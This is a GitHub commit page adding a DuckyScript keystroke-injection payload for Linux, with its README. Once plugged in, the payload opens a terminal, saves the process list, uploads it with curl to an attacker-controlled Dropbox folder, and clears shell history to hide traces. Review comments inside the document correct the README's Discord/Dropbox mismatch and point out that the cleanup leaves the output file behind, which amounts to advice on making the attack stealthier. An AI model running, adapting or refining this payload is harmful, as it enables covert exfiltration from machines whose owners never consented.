Merge pull request #152 from aleff-github/patch-19

Exfiltrate Process Info
pull/178/head
Kalani Helekunihi 2023-06-12 14:36:20 -04:00 committed by GitHub
commit 9af47a7c54
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 69 additions and 0 deletions

@ -0,0 +1,27 @@
# Exfiltrate Process Info - Linux ✅
A script used to exfiltrate the process info on a Linux machine.
**Category**: Exfiltration
## Description
A script used to exfiltrate the process info on a Linux machine.
Opens a shell, get the process info, set the Discord webhook configuration, send it to the discord webhook, erase traces.
## Getting Started
### Dependencies
* Internet Connection
* Discord Webhook
### Executing program
* Plug in your device
### Settings
* Set the Discord Webhook configuration
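Review bot: the README disagrees with the payload this PR adds: the Description says the process list is sent to a Discord webhook and the Dependencies and Settings bullets name a "Discord Webhook", while the script DEFINEs a Dropbox access token and folder name and posts to content.dropboxapi.com. Update the Description, Dependencies and Settings to name Dropbox (access token plus folder name), and drop the one-line summary that is repeated verbatim under both the title and "## Description".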

@ -0,0 +1,42 @@
REM ##########################################
REM # |
REM # Title : Exfiltrate Process Info |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##########################################
REM Requirements:
REM - Internet Connection
REM - Discord Webhook
REM Required: Set here your Dropbox access TOKEN
DEFINE #TOKEN example
DEFINE #DROPBOX_FOLDER_NAME example
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
DEFAULT_DELAY 500
CTRL ALT t
DELAY 2000
REM #### GET PROCESS SECTION ####
STRINGLN ps aux > process.txt
REM #### EXFILTRATE SECTION ####
STRINGLN ACCESS_TOKEN="#TOKEN"
STRINGLN USER_NAME=$(whoami)
STRINGLN TXT_PATH="/home/$USER_NAME/process.txt"
REM Set yout Dropbox folder name
STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
STRINGLN curl -X POST #DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
DELAY 2000
REM #### REMOVE TRACES ####
STRINGLN history -c
STRINGLN exit
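Review bot: the header comments are stale against the DEFINEs: "REM - Discord Webhook" under Requirements should read Dropbox access token, and the placeholder `example` on `DEFINE #TOKEN` and `DEFINE #DROPBOX_FOLDER_NAME` will be typed and submitted as a literal bearer token if a user forgets to edit it, so use an obviously invalid placeholder such as `REPLACE_ME` and say in the README that both values must be set. The "REMOVE TRACES" section also overstates what it does: `history -c` only clears the running shell's in-memory history, and process.txt is still left in the home directory, so the README's "erase traces" wording should describe that accurately. Minor: "Set yout Dropbox folder name" should be "your", and "It depends by the internet connection" should be "depends on".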